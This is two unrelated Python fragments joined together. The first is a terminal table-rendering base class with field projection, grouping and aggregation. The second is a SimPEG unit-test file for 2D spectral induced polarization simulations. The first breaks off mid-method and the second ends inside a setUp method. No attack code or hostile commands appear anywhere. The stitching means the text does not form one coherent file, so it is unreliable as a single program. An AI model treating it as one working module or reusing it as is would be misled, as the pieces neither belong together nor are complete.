# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from collections import OrderedDict
from itertools import groupby
from operator import itemgetter

from lib.utils import util
from lib.view.terminal import get_terminal_size, terminal

from .. import decleration
from ..const import DynamicFieldOrder
from ..source import source_lookup
from .render_utils import ErrorEntry, NoEntry


class BaseRSheet(object):
    # Base class for rendering a sheet decleration against a set of data
    # sources.  Subclasses implement the concrete output style by overriding
    # do_render / do_create_tuple_field / do_create_field.
    def __init__(
        self,
        sheet,
        title,
        sources,
        common,
        description=None,
        selectors=None,
        title_repeat=False,
        disable_aggregations=False,
        dynamic_diff=False,
    ):
        """
        Arguments:
        sheet   -- The decleration.sheet to render.
        title   -- Title for this render.
        sources -- Dictionary of data-sources to project fields from.
        common  -- A dict of common information passed to each entry.

        Keyword Arguments:
        description -- A description of the sheet.
        selectors   -- List of regular expressions to select which fields
                       from dynamic fields.
        title_repeat -- Repeat title/row headers every screen width.
                        Doesn't affect SheetStyle.json.
        disable_aggregations -- Disable sheet aggregations.
        dynamic_diff -- Only show dynamic fields that aren't uniform.
        """
        self.decleration = sheet
        self.title = title
        # Keep the raw sources around for debugging; _init_sources rewrites
        # them into per-record dicts in self.sources.
        self._debug_sources = sources
        self._init_sources(sources)
        self.common = common
        self.description = description
        self.selector = util.compile_likes(selectors)
        self.title_repeat = title_repeat
        self.disable_aggregations = disable_aggregations
        self.dynamic_diff = dynamic_diff
        self.terminal_size = get_terminal_size()

        self.dfields = self.get_dfields()

        if not self.dfields:
            self.rfields = None  # nothing to display
            return

        # Projection pipeline: project -> where -> group -> diff -> order.
        projections = self.project_fields()
        projections = self.where(projections)

        if self.has_all_required_fields(projections):
            projections_groups = self.group_by_fields(projections)
            # One (initially empty) hidden-field list per group; diff() may
            # rebuild this when dynamic_diff is enabled.
            self.group_hidden_fields = [[]] * len(projections_groups)
            projections_groups = self.diff(projections_groups)
            projections_groups = self.order_by_fields(projections_groups)
            self.rfields = self.create_rfields(projections_groups)
            self.visible_rfields = [
                rfield for rfield in self.rfields if not rfield.hidden
            ]

            for rfield in self.rfields:
                rfield.prepare()
        else:
            self.rfields = None  # nothing to display

    # =========================================================================
    # Required overrides.

    def do_render(self):
        """
        Renders the data in the style defined by the RSheet class.
        """
        raise NotImplementedError("override")

    def do_create_tuple_field(self, field, groups):
        """
        Each RSheet may define custom versions of RSubgroup.

        Arguments:
        field  -- The decleration.Subgroup describing this tuple field.
        groups -- The data sources having already been processed into groups.
        """
        raise NotImplementedError("override")

    def do_create_field(self, field, groups, parent_key=None):
        """
        Each RSheet may define custom version of RFields.

        Arguments:
        field  -- The decleration.Field describing this field.
        groups -- The data sources having already been processed into groups.

        Keyword Arguments:
        parent_key -- If this field is the child of a Subgroup, then this is
                      the key defined within that Subgroup.
        """
        raise NotImplementedError("override")

    # =========================================================================
    # Other methods.

    def _init_sources(self, sources):
        # Pivot sources from {'source': {'row_key': value}} into a list of
        # per-record dicts [{'source': value}], then expand for_each entries.

        # TODO - This assertion can fire when a node is leaving/joining and
        #        some commands on a subset of the nodes. Should this event be
        #        logged?
        # n_source_records = map(len, list(sources.values()))
        # assert len(set(n_source_records)) == 1, \
        #     "sources contain different numbers of records {}".format(
        #         zip(sources.keys(), n_source_records))

        # Change sources from: {'source':{'row_key':value}}
        #                  to: [{'source':value}]

        # If source is a list convert it to a dictionary keyed by index.
        for key in sources.keys():
            if isinstance(sources[key], list):
                sources[key] = dict(enumerate(sources[key]))

        source_keys = {}  # Using a dict as a set to maintain order and exclusivity

        for data in sources.values():
            if isinstance(data, dict):
                for keys in data.keys():
                    source_keys[keys] = None

        converted_sources = []

        for row_key in source_keys:
            new_source = {}

            # NOTE: for/else — the 'else' runs after the inner loop finishes
            # normally (there is no break), so each assembled record is
            # appended exactly once.  .get() yields None for sources that
            # lack this row_key.
            for source, value in sources.items():
                new_source[source] = value.get(row_key)
            else:
                converted_sources.append(new_source)

        # Expand for_each: each item of a for_each source becomes its own
        # record, with the (key, value) tuple substituted in.
        expanded_sources = []

        for source in converted_sources:
            if not self.decleration.for_each:
                expanded_sources.append(source)
                continue

            for for_each in self.decleration.for_each:
                sub_source = source[for_each]

                try:
                    for item in sub_source.items():
                        new_source = source.copy()
                        new_source[for_each] = item
                        expanded_sources.append(new_source)
                except AttributeError:
                    # Non-iterable - probably an Exception.
                    new_source = source.copy()
                    new_source[for_each] = ErrorEntry
                    expanded_sources.append(new_source)

        self.sources = expanded_sources
        self.n_records = len(expanded_sources)

    def render(self):
        # Returns None when there is nothing to display.
        # XXX - Could be useful to pass 'group_by' and 'order_by' into the
        #       render function. Could use the decl's copy as their defaults.
        if self.rfields is None:
            return None

        return self.do_render()

    def get_dfields(self):
        # Resolve the sheet's field declerations into a flat list, expanding
        # each DynamicFields decleration into one Field per discovered key.
        dfields = []
        ignore_keys = set()

        for dfield in self.decleration.fields:
            if isinstance(dfield, decleration.DynamicFields):
                keys = {}  # dict used as an ordered set of discovered keys

                for sources in self.sources:
                    try:
                        # A tuple here means the source was expanded by
                        # for_each into a (key, value) pair.
                        if dfield.source in self.decleration.for_each and isinstance(
                            sources[dfield.source], tuple
                        ):
                            keys.update(
                                (
                                    (k, None)
                                    for k in source_lookup(sources, dfield.source)[
                                        1
                                    ].keys()
                                )
                            )
                        else:
                            keys.update(
                                (
                                    (k, None)
                                    for k in source_lookup(
                                        sources, dfield.source
                                    ).keys()
                                )
                            )
                    except (AttributeError, TypeError):
                        pass

                if self.selector is not None:
                    keys = [
                        key for key in keys if self.selector.search(key) is not None
                    ]

                # NOTE(review): if self.selector is None and an order is
                # requested, `keys` is still a dict here and dict has no
                # .sort(); this appears to rely on util.compile_likes always
                # returning a matcher — confirm.
                if dfield.order is DynamicFieldOrder.ascending:
                    keys.sort()
                elif dfield.order is DynamicFieldOrder.descending:
                    keys.sort(reverse=True)

                for key in keys:
                    if key in ignore_keys:
                        continue

                    if dfield.converter_selector:
                        conv_func = dfield.converter_selector(key)
                    else:
                        conv_func = None

                    if dfield.projector_selector:
                        proj_func = dfield.projector_selector(key)
                        proj = proj_func(dfield.source, key)
                    else:
                        # No explicit projector - infer one from the data.
                        proj = self._infer_projector(dfield, key)

                    if (
                        not self.disable_aggregations
                        and dfield.aggregator_selector is not None
                    ):
                        aggr = dfield.aggregator_selector(
                            key, self._is_projector_numeric(proj)
                        )
                    else:
                        aggr = None

                    dfields.append(
                        decleration.Field(
                            key,
                            proj,
                            aggregator=aggr,
                            dynamic_field_decl=dfield,
                            converter=conv_func,
                        )
                    )
            else:
                dfields.append(dfield)

                # To keep data displayed in a Field from being displayed in a DynamicFields
                if (
                    isinstance(dfield, decleration.Field)
                    and dfield.projector.keys is not None
                ):
                    ignore_keys.update(dfield.projector.keys)

        return dfields

    def _is_projector_numeric(self, projector):
        # True for Float/Number projectors; used to pick numeric aggregators.
        return isinstance(projector, decleration.Projectors.Float) or isinstance(
            projector, decleration.Projectors.Number
        )

    def _infer_projector(self, dfield, key):
        # Choose a projector type by sampling the actual entry values:
        # all int-like -> Number, else all float-like -> Float, else String.
        proj_args = (dfield.source, key)

        if not dfield.infer_projectors:
            return decleration.Projectors.String(*proj_args)

        entries = []

        for sources in self.sources:
            try:
                if isinstance(sources[dfield.source], tuple):
                    entries.append(source_lookup(sources, dfield.source)[1][key])
                else:
                    entries.append(source_lookup(sources, dfield.source)[key])
            except (KeyError, TypeError):
                # Missing or error retrieving, ignore for inference.
                pass

        has_string = False
        has_float = False
        has_int = False

        for entry in entries:
            try:
                int(entry)
                has_int = True
                continue
            except (ValueError, TypeError):
                pass

            try:
                float(entry)
                has_float = True
                continue
            except (ValueError, TypeError):
                pass

            has_string = True

        # String wins over Float wins over Number (the widest type seen).
        if has_string:
            return decleration.Projectors.String(*proj_args)
        elif has_float:
            return decleration.Projectors.Float(*proj_args)
        elif has_int:
            return decleration.Projectors.Number(*proj_args)
        else:
            # no entries
            return decleration.Projectors.String(*proj_args)

    def project_fields(self):
        # Build one OrderedDict projection per source record, keyed by field.
        projections = []

        for sources in self.sources:
            projection = OrderedDict()
            projections.append(projection)

            for dfield in self.dfields:
                self._project_field(dfield, sources, projection)

        return projections

    def _project_field(self, dfield, sources, projection):
        # Subgroups recurse into a nested OrderedDict; leaf fields store the
        # projected entry (or the NoEntry/ErrorEntry sentinels).
        if isinstance(dfield, decleration.Subgroup):
            child_projections = OrderedDict()
            projection[dfield.key] = child_projections

            for child_dfield in dfield.fields:
                self._project_field(child_dfield, sources, child_projections)

            return

        try:
            entry = dfield.projector(self.decleration, sources)
        except decleration.NoEntryException:
            entry = NoEntry
        except decleration.ErrorEntryException:
            entry = ErrorEntry

        projection[dfield.key] = entry

    def where(self, projections):
        # Filter projections in place using the sheet's 'where' predicate.
        if self.decleration.where:
            where_fn = self.decleration.where

            # Iterate backwards so deletions don't shift unvisited indices.
            for record_ix in range(len(projections) - 1, -1, -1):
                if not where_fn(projections[record_ix]):
                    del projections[record_ix]

        return projections

    def has_all_required_fields(self, projections):
        # True when every 'required' DynamicFields decleration produced at
        # least one concrete field.  (The projections argument is currently
        # unused.)
        required_dfields = set()

        for dfield in self.decleration.fields:
            if not isinstance(dfield, decleration.DynamicFields):
                continue

            if dfield.required:
                required_dfields.add(dfield)

        if not required_dfields:
            return True

        # NOTE: this aliases (does not copy) required_dfields; both names
        # refer to the same local set, which is fine here.
        unfound_fields = required_dfields

        for dfield in self.dfields:
            if dfield.dynamic_field_decl in unfound_fields:
                unfound_fields.remove(dfield.dynamic_field_decl)

            if not unfound_fields:
                return True

        return False

    def diff(self, projection_groups):
        # When dynamic_diff is on, drop dynamic fields whose values are
        # uniform: fields uniform in *all* groups are removed outright from
        # self.dfields and the projections; fields uniform only in some
        # groups are blanked there and recorded in group_hidden_fields.
        if not self.dynamic_diff:
            return projection_groups

        dynamic_dfields = [
            dfield
            for dfield in self.dfields
            if isinstance(dfield.dynamic_field_decl, decleration.DynamicFields)
            or dfield.allow_diff
        ]
        drop_dfields_groups = []

        for group_idx in range(len(projection_groups)):
            drop_dfields = []

            for dfield in dynamic_dfields:
                entries = [
                    projection[dfield.key]
                    for projection in list(projection_groups.values())[group_idx]
                    if not projection[dfield.key] in (NoEntry, ErrorEntry)
                ]

                # NOTE: if entries is empty the generator never evaluates
                # entries[0], so all(...) is vacuously True and the field is
                # dropped — no IndexError here.
                if all(entries[0] == entry for entry in entries):
                    drop_dfields.append(dfield)

            drop_dfields_groups.append(drop_dfields)

        # dfields in intersection can be dropped from all projections.
        # If it is not in interestion but needs to be "dropped" (not displayed)
        # from a specific group we will use hidden_fields
        drop_intersection = set(drop_dfields_groups[0])

        for drop_dfields in drop_dfields_groups:
            drop_intersection = drop_intersection.intersection(set(drop_dfields))

        self.group_hidden_fields = []

        for group_idx in range(len(projection_groups)):
            hidden_fields = []

            for dfield in drop_dfields_groups[group_idx]:
                for projection in list(projection_groups.values())[group_idx]:
                    if dfield.key in projection:
                        # If a field is in drop_intersection is it being dropped
                        # from all groups.
                        if dfield in drop_intersection:
                            if dfield in self.dfields:
                                self.dfields.remove(dfield)

                            del projection[dfield.key]
                        # Some groups need to drop the value and others do not.
                        # Using hidden_fields[group_idx] to indicate when a
                        # group should not display the field.
                        else:
                            projection[dfield.key] = None
                            hidden_fields.append(dfield)

            self.group_hidden_fields.append(hidden_fields)

        return projection_groups

    def group_by_fields(self, projections):
        """
        Single or composite key grouping
        """
        # XXX - Allow 'group by' on a field within a Subgroup.
        # Start with one group holding everything, then split it repeatedly,
        # once per group_by key.  groupby requires its input sorted by the
        # same key, hence the sorted() immediately before it.
        grouping = (((), projections),)
        group_bys = self.decleration.group_bys

        if group_bys is None:
            return OrderedDict(grouping)

        if isinstance(group_bys, str):
            group_bys = (group_bys,)

        for group_by in group_bys:
            next_grouping = []

            for pkey, pgroup in grouping:
                pgroup_sort = sorted(pgroup, key=itemgetter(group_by))
                cgroups = [
                    (pkey + (ckey,), list(cgroup))
                    for ckey, cgroup in groupby(pgroup_sort, key=itemgetter(group_by))
                ]

                next_grouping.extend(cgroups)

            grouping = next_grouping

        return OrderedDict(grouping)

    def order_by_fields(self, projections_groups):
        # XXX - Allow 'order by' on a field within a Subgroup.
        # XXX - Allow desc order.
        order_bys = self.decleration.order_bys

        if order_bys is None:
            return projections_groups

        for projections_group in projections_groups.values():
            # Sort by the keys in reverse order; because list.sort is stable
            # the first order_by ends up as the primary sort key.
            for order_by in order_bys[::-1]:
                projections_group.sort(key=itemgetter(order_by))

        return projections_groups

    def create_rfields(self, projections_groups):
        # Create one render-field per decleration field from the grouped data.
        groups = projections_groups.values()

        return [self.create_rfield(field, groups) for field in self.dfields]

    def create_rfield(self, field, groups, parent_key=None):
        if isinstance(field, decleration.Subgroup):
            return self.do_create_tuple_field(field, groups)

        return self.do_create_field(field, groups, parent_key=parent_key)


class BaseRSubgroup(object):
    # Render-side counterpart of decleration.Subgroup: a tuple field whose
    # subfields are created through the owning rsheet.
    def __init__(self, rsheet, field, groups):
        """
        Arguments:
        rsheet -- BaseRSheet being rendered.
        field  -- decleration.Subgroup.
        groups -- Sequence of sub-sequences where each sub-sequence is a
                  group determined by 'rsheet.decleration.group_bys'.
        """
        self.rsheet = rsheet
        self.decleration = field
        self.parent_key = None
        self.n_groups = len(groups)

        self._init_as_tuple_field(groups)

    # =========================================================================
    # Optional overrides.

    def do_prepare(self):
        """
        Post processing phase after all fields in the RSheet have been
        initialized.
        """
        return  # Override if as needed.

    # =========================================================================
    # Other methods.

    def _init_as_tuple_field(self, groups):
        # A subgroup is hidden when every one of its subfields is hidden.
        self.is_tuple_field = True
        self.subfields = [
            self.rsheet.do_create_field(
                subdecl, groups, parent_key=self.decleration.key
            )
            for subdecl in self.decleration.fields
        ]
        self.visible = [subfield for subfield in self.subfields if not subfield.hidden]
        self.hidden = not self.visible

    def prepare(self):
        # Prepare visible subgroups only; delegates extra work to do_prepare.
        if self.hidden:
            return

        for subfield in self.subfields:
            subfield.prepare()

        self.do_prepare()

    def has_aggregate(self):
        return any(sub.has_aggregate() for sub in self.visible)

    def get_kv(self, group_ix, entry_ix):
        # (subgroup key, {subfield key: value, ...}) for one entry.
        return (
            self.decleration.key,
            dict(sub.get_kv(group_ix, entry_ix) for sub in self.visible),
        )

    def n_entries_in_group(self, group_ix):
        # All subfields share the same entry count; ask the first.
        return self.subfields[0].n_entries_in_group(group_ix)


class BaseRField(object):
    def __init__(self, rsheet, field, groups, parent_key=None):
        """
        Arguments:
        rsheet -- BaseRSheet being rendered.
        field  -- 'decleration.Subgroup'.
        groups -- Sequence of sub-sequences where each sub-sequence is a
                  group determined by 'rsheet.decleration.group_bys'.

        Keyword Argument:
        parent_key -- Not None: the decleration.key value for the parent
                      'Subgroup'.
""" self.rsheet = rsheet self.decleration = field self.parent_key = parent_key self.n_groups = len(groups) if self.rsheet.decleration.group_bys: self.is_grouped_by = ( self.decleration.key in self.rsheet.decleration.group_bys ) else: self.is_grouped_by = False if self.rsheet.decleration.order_bys: self.is_ordered_by = ( self.decleration.key in self.rsheet.decleration.order_bys ) else: self.is_ordered_by = False self._init_as_field(groups) # ========================================================================= # Optional overrides. def do_prepare(self): """ Post processing phase after all fields in the RSheet have been initialized. """ return # Override as needed. # ========================================================================= # Other methods. def _init_as_field(self, raw_groups): self.is_tuple_field = False self.groups = [] self.groups_converted = [] self.aggregates = [] self.aggregates_converted = [] self._init_load_groups(raw_groups) def _init_load_groups(self, raw_groups): field_key = self.decleration.key if self.parent_key: self.groups = [ list(map(lambda g: g[self.parent_key][field_key], raw_group)) for raw_group in raw_groups ] else: self.groups = [ list(map(itemgetter(field_key), raw_group)) for raw_group in raw_groups ] # Determine if hidden. 
if self.decleration.hidden is None: self.hidden = not any( v is not NoEntry for group in self.groups for v in group ) else: self.hidden = self.decleration.hidden def prepare(self): if self.hidden: return self._prepare_entry_data() for entry_group in self.groups_entry_data: self._prepare_aggregate_group(entry_group) self._prepare_convert() self.do_prepare() def _prepare_entry_data(self): self.groups_entry_data = [] for group_ix, group in enumerate(self.groups): entry_edata = [] self.groups_entry_data.append(entry_edata) entries = [self.entry_value(e) for e in group] for entry_ix, entry in enumerate(entries): record = dict( ( rfield.get_kv(group_ix, entry_ix) for rfield in self.rsheet.rfields ) ) entry_edata.append( decleration.EntryData( value=entry, values=entries, record=record, common=self.rsheet.common, is_error=group[entry_ix] is ErrorEntry, is_no_entry=group[entry_ix] is NoEntry, ) ) def _prepare_aggregate_group(self, group): if self.hidden: # Do not need to aggregate hidden fields. self.aggregates.append(None) self.aggregates_converted.append("") return if self.rsheet.disable_aggregations or self.decleration.aggregator is None: if self.is_grouped_by and self.rsheet.decleration.has_aggregates: # If a grouped field doesn't have an aggregator then the grouped # value will appear in the aggregates line. 
entry = group[0].value self.aggregates.append(entry) if group[0].is_error: self.aggregates_converted.append( self.rsheet.decleration.error_entry ) elif group[0].is_no_entry: self.aggregates_converted.append(self.rsheet.decleration.no_entry) else: self.aggregates_converted.append(str(entry)) else: self.aggregates.append(None) self.aggregates_converted.append("") return if any(e.is_error for e in group): aggregate_value = ErrorEntry else: group_entries = [e for e in group if not e.is_no_entry] aggregate_value = self.decleration.aggregator.compute(group_entries) if aggregate_value is None: aggregate_value = NoEntry self.aggregates.append(aggregate_value) def _prepare_convert(self): self._prepare_convert_groups() self._prepare_convert_aggregates() def _prepare_convert_groups(self): self.groups_converted = [] for fgroup in self.groups_entry_data: group_converted = [] self.groups_converted.append(group_converted) for edata in fgroup: if edata.value is None: if edata.is_error: group_converted.append(self.rsheet.decleration.error_entry) else: group_converted.append(self.rsheet.decleration.no_entry) else: group_converted.append(str(self.decleration.converter(edata))) def _prepare_convert_aggregates(self): if self.decleration.aggregator is None: return self.aggregates_converted = [] if self.decleration.aggregator.converter is None: converter = self.decleration.converter else: converter = self.decleration.aggregator.converter for aggr_ix, aggregate in enumerate(self.aggregates): if aggregate is None: self.aggregates_converted.append("") elif aggregate is NoEntry: self.aggregates_converted.append(self.rsheet.decleration.no_entry) elif aggregate is ErrorEntry: self.aggregates_converted.append(self.rsheet.decleration.error_entry) else: self.aggregates_converted.append( str(converter(decleration.EntryData(value=aggregate))) ) def entry_value(self, entry): if entry is ErrorEntry or entry is NoEntry: return None return entry def get_kv(self, group_ix, entry_ix): entry = 
self.groups[group_ix][entry_ix] return self.decleration.key, self.entry_value(entry) def has_aggregate(self): return self.decleration.aggregator is not None def n_entries_in_group(self, group_ix): return len(self.groups[group_ix]) def entry_format(self, group_ix, entry_ix): """ Arguments: group_ix -- Index of a group in self.groups. entry_ix -- Index of an entry within a group. Return: Tuple of form (string_alert, format_function). The string_alert can be used when sheet is displayed in a plain text rendering (currently only for testing format). """ edata = self.groups_entry_data[group_ix][entry_ix] if edata.is_error: return None, lambda v: terminal.fg_magenta() + v + terminal.fg_not_magenta() for name, formatter in self.decleration.formatters: format_fn = formatter(edata) if format_fn is not None: return name, format_fn return None, None class BaseRSheetCLI(BaseRSheet): def _do_render_title(self, render, width): # XXX - Same as column. filler = self.decleration.title_fill columns = self.terminal_size.columns min_columns = len(self.title) + 6 if min_columns < columns: min_columns = columns n_repeates = width // min_columns if width > min_columns and n_repeates != 1: extra_columns = (columns % min_columns) // n_repeates new_width = min_columns + extra_columns t = "".join( [self.title.center(new_width, filler) for _ in range(n_repeates)] ) t = t.ljust(width, filler) else: t = self.title.center(width, filler) if len(t) > 0: if not t.startswith(filler): t = filler + t if not t.endswith(filler): t += filler title_width = len(t) t = terminal.bold() + t + terminal.unbold() render.append(t) return title_width def _do_render_description(self, render, line_width, desc_width): # XXX - Same as column. 
if self.description is None or self.description == "": return [] tdesc = self.description[:].split(" ") lines = [] words = [] while tdesc != []: words.append(tdesc.pop(0)) line = " ".join(words) if len(line) >= desc_width: if len(words) > 1: tdesc.insert(0, words.pop()) line = " ".join(words) words = [] lines.append(line) else: if words: line = " ".join(words) lines.append(line) description = [ terminal.dim() + line.center(line_width) + terminal.reset() for line in lines ] description = "\n".join(description) render.append(description) def _do_render_n_rows(self, render, n_records): # XXX - Same as column. render.append( terminal.dim() + "Number of rows: {}".format(n_records) + terminal.undim() )
# NOTE(review): this chunk was whitespace-mangled; formatting reconstructed.
# Unit tests for SimPEG spectral induced polarization (SIP) 2D simulations:
# derivative (Jvec), adjoint (Jtvec), and data-misfit gradient checks.
from __future__ import print_function
import unittest
import discretize
from SimPEG import (
    utils,
    maps,
    data_misfit,
    regularization,
    optimization,
    inversion,
    inverse_problem,
    tests,
)
import numpy as np
from SimPEG.electromagnetics import spectral_induced_polarization as sip

# Prefer the fast Pardiso direct solver when pymatsolver is installed.
try:
    from pymatsolver import Pardiso as Solver
except ImportError:
    from SimPEG import SolverLU as Solver

# Fixed seed so the random test vectors (and added noise) are reproducible.
np.random.seed(38)


class SIPProblemTestsCC(unittest.TestCase):
    """Checks for the cell-centered SIP simulation (Simulation2DCellCentered)."""

    def setUp(self):
        # Tensor mesh with padding cells (growth factor 1.3) on the outside.
        cs = 25.0
        hx = [(cs, 0, -1.3), (cs, 21), (cs, 0, 1.3)]
        hz = [(cs, 0, -1.3), (cs, 20)]
        mesh = discretize.TensorMesh([hx, hz], x0="CN")
        # Two chargeable spheres embedded in a uniform background.
        blkind0 = utils.model_builder.getIndicesSphere(
            np.r_[-100.0, -200.0], 75.0, mesh.gridCC
        )
        blkind1 = utils.model_builder.getIndicesSphere(
            np.r_[100.0, -200.0], 75.0, mesh.gridCC
        )
        sigma = np.ones(mesh.nC) * 1e-2
        eta = np.zeros(mesh.nC)
        tau = np.ones_like(sigma) * 1.0
        eta[blkind0] = 0.1
        eta[blkind1] = 0.1
        tau[blkind0] = 0.1
        tau[blkind1] = 0.1

        # Dipole-dipole style survey along the surface.
        x = mesh.vectorCCx[(mesh.vectorCCx > -155.0) & (mesh.vectorCCx < 155.0)]
        Aloc = np.r_[-200.0, 0.0]
        Bloc = np.r_[200.0, 0.0]
        M = utils.ndgrid(x - 25.0, np.r_[0.0])
        N = utils.ndgrid(x + 25.0, np.r_[0.0])
        times = np.arange(10) * 1e-3 + 1e-3
        rx = sip.receivers.Dipole(M, N, times)
        src = sip.sources.Dipole([rx], Aloc, Bloc)
        survey = sip.Survey([src])
        # Model is the concatenation [eta, 1/tau] split by Wires.
        wires = maps.Wires(("eta", mesh.nC), ("taui", mesh.nC))
        problem = sip.Simulation2DCellCentered(
            mesh,
            rho=1.0 / sigma,
            etaMap=wires.eta,
            tauiMap=wires.taui,
            verbose=False,
            solver=Solver,
            survey=survey,
        )
        mSynth = np.r_[eta, 1.0 / tau]
        problem.model = mSynth
        dobs = problem.make_synthetic_data(mSynth, add_noise=True)
        # Now set up the problem to do some minimization
        dmis = data_misfit.L2DataMisfit(data=dobs, simulation=problem)
        reg = regularization.Tikhonov(mesh)
        opt = optimization.InexactGaussNewton(
            maxIterLS=20, maxIter=10, tolF=1e-6, tolX=1e-6, tolG=1e-6, maxIterCG=6
        )
        invProb = inverse_problem.BaseInvProblem(dmis, reg, opt, beta=1e4)
        inv = inversion.BaseInversion(invProb)
        self.inv = inv
        self.reg = reg
        self.p = problem
        self.mesh = mesh
        self.m0 = mSynth
        self.survey = survey
        self.dmis = dmis
        self.dobs = dobs

    def test_misfit(self):
        # Taylor-series derivative test of dpred/Jvec at the synthetic model.
        passed = tests.checkDerivative(
            lambda m: [self.p.dpred(m), lambda mx: self.p.Jvec(self.m0, mx)],
            self.m0,
            plotIt=False,
            num=3,
        )
        self.assertTrue(passed)

    def test_adjoint(self):
        # Adjoint Test
        # u = np.random.rand(self.mesh.nC*self.survey.nSrc)
        # Verify <w, J v> == <J^T w, v> to tight tolerance.
        v = np.random.rand(self.mesh.nC * 2)
        w = np.random.rand(self.survey.nD)
        wtJv = w.dot(self.p.Jvec(self.m0, v))
        vtJtw = v.dot(self.p.Jtvec(self.m0, w))
        passed = np.abs(wtJv - vtJtw) < 1e-10
        print("Adjoint Test", np.abs(wtJv - vtJtw), passed)
        self.assertTrue(passed)

    def test_dataObj(self):
        # Derivative test of the L2 data misfit.
        passed = tests.checkDerivative(
            lambda m: [self.dmis(m), self.dmis.deriv(m)], self.m0, plotIt=False, num=3
        )
        self.assertTrue(passed)


class SIPProblemTestsN(unittest.TestCase):
    """Same checks for the nodal SIP simulation (Simulation2DNodal)."""

    def setUp(self):
        # Mesh/model construction mirrors SIPProblemTestsCC.setUp.
        cs = 25.0
        hx = [(cs, 0, -1.3), (cs, 21), (cs, 0, 1.3)]
        hz = [(cs, 0, -1.3), (cs, 20)]
        mesh = discretize.TensorMesh([hx, hz], x0="CN")
        blkind0 = utils.model_builder.getIndicesSphere(
            np.r_[-100.0, -200.0], 75.0, mesh.gridCC
        )
        blkind1 = utils.model_builder.getIndicesSphere(
            np.r_[100.0, -200.0], 75.0, mesh.gridCC
        )
        sigma = np.ones(mesh.nC) * 1e-2
        eta = np.zeros(mesh.nC)
        tau = np.ones_like(sigma) * 1.0
        eta[blkind0] = 0.1
        eta[blkind1] = 0.1
        tau[blkind0] = 0.1
        tau[blkind1] = 0.1

        x = mesh.vectorCCx[(mesh.vectorCCx > -155.0) & (mesh.vectorCCx < 155.0)]
        Aloc = np.r_[-200.0, 0.0]
        Bloc = np.r_[200.0, 0.0]
        M = utils.ndgrid(x - 25.0, np.r_[0.0])
        N = utils.ndgrid(x + 25.0, np.r_[0.0])
        times = np.arange(10) * 1e-3 + 1e-3
        rx = sip.receivers.Dipole(M, N, times)
        src = sip.sources.Dipole([rx], Aloc, Bloc)
        survey = sip.Survey([src])
        wires = maps.Wires(("eta", mesh.nC), ("taui", mesh.nC))
        # Nodal formulation takes sigma directly (not rho).
        problem = sip.Simulation2DNodal(
            mesh,
            sigma=sigma,
            etaMap=wires.eta,
            tauiMap=wires.taui,
            verbose=False,
            solver=Solver,
            survey=survey,
        )
        mSynth = np.r_[eta, 1.0 / tau]
        problem.model = mSynth
        dobs = problem.make_synthetic_data(mSynth, add_noise=True)
        # Now set up the problem to do some minimization
        dmis = data_misfit.L2DataMisfit(data=dobs, simulation=problem)
        reg = regularization.Tikhonov(mesh)
        opt = optimization.InexactGaussNewton(
            maxIterLS=20, maxIter=10, tolF=1e-6, tolX=1e-6, tolG=1e-6, maxIterCG=6
        )
        invProb = inverse_problem.BaseInvProblem(dmis, reg, opt, beta=1e4)
        inv = inversion.BaseInversion(invProb)
        self.inv = inv
        self.reg = reg
        self.p = problem
        self.mesh = mesh
        self.m0 = mSynth
        self.survey = survey
        self.dmis = dmis
        self.dobs = dobs

    def test_misfit(self):
        passed = tests.checkDerivative(
            lambda m: [self.p.dpred(m), lambda mx: self.p.Jvec(self.m0, mx)],
            self.m0,
            plotIt=False,
            num=3,
        )
        self.assertTrue(passed)

    def test_adjoint(self):
        # Adjoint Test
        # NOTE(review): looser tolerance (1e-8) than the cell-centered test.
        v = np.random.rand(self.mesh.nC * 2)
        w = np.random.rand(self.survey.nD)
        wtJv = w.dot(self.p.Jvec(self.m0, v))
        vtJtw = v.dot(self.p.Jtvec(self.m0, w))
        passed = np.abs(wtJv - vtJtw) < 1e-8
        print("Adjoint Test", np.abs(wtJv - vtJtw), passed)
        self.assertTrue(passed)

    def test_dataObj(self):
        passed = tests.checkDerivative(
            lambda m: [self.dmis(m), self.dmis.deriv(m)], self.m0, plotIt=False, num=2
        )
        self.assertTrue(passed)


class SIPProblemTestsN_air(unittest.TestCase):
    """Nodal SIP checks with an air layer (active cells) and a Cole-Cole 'c'."""

    def setUp(self):
        cs = 25.0
        hx = [(cs, 0, -1.3), (cs, 21), (cs, 0, 1.3)]
        hz = [(cs, 0, -1.3), (cs, 20)]
        mesh = discretize.TensorMesh([hx, hz], x0="CN")
        blkind0 = utils.model_builder.getIndicesSphere(
            np.r_[-100.0, -200.0], 75.0, mesh.gridCC
        )
        blkind1 = utils.model_builder.getIndicesSphere(
            np.r_[100.0, -200.0], 75.0, mesh.gridCC
        )
        sigma = np.ones(mesh.nC) * 1e-2
        eta = np.zeros(mesh.nC)
        tau = np.ones_like(sigma) * 1.0
        c = np.ones_like(sigma)
        eta[blkind0] = 0.1
        eta[blkind1] = 0.1
        tau[blkind0] = 0.1
        tau[blkind1] = 0.1

        x = mesh.vectorCCx[(mesh.vectorCCx > -155.0) & (mesh.vectorCCx < 155.0)]
        # Electrodes buried at z = -50 (below the air interface).
        Aloc = np.r_[-200.0, -50]
        Bloc = np.r_[200.0, -50]
        M = utils.ndgrid(x - 25.0, np.r_[0.0])
        N = utils.ndgrid(x + 25.0, np.r_[0.0])
        # Cells above z = -40 are air; maps inject fixed values there.
        airind = mesh.gridCC[:, 1] > -40
        actmapeta = maps.InjectActiveCells(mesh, ~airind, 0.0)
        actmaptau = maps.InjectActiveCells(mesh, ~airind, 1.0)
        actmapc = maps.InjectActiveCells(mesh, ~airind, 1.0)
        times = np.arange(10) * 1e-3 + 1e-3
        rx = sip.receivers.Dipole(M, N, times)
        src = sip.sources.Dipole([rx], Aloc, Bloc)
        survey = sip.Survey([src])
        wires = maps.Wires(
            ("eta", actmapeta.nP), ("taui", actmaptau.nP), ("c", actmapc.nP)
        )
        problem = sip.Simulation2DNodal(
            mesh,
            sigma=sigma,
            etaMap=actmapeta * wires.eta,
            tauiMap=actmaptau * wires.taui,
            cMap=actmapc * wires.c,
            actinds=~airind,
            solver=Solver,
            survey=survey,
        )
        # Model holds only the active (sub-surface) cells.
        mSynth = np.r_[eta[~airind], 1.0 / tau[~airind], c[~airind]]
        dobs = problem.make_synthetic_data(mSynth, add_noise=True)
        # Now set up the problem to do some minimization
        dmis = data_misfit.L2DataMisfit(data=dobs, simulation=problem)
        reg_eta = regularization.Simple(mesh, mapping=wires.eta, indActive=~airind)
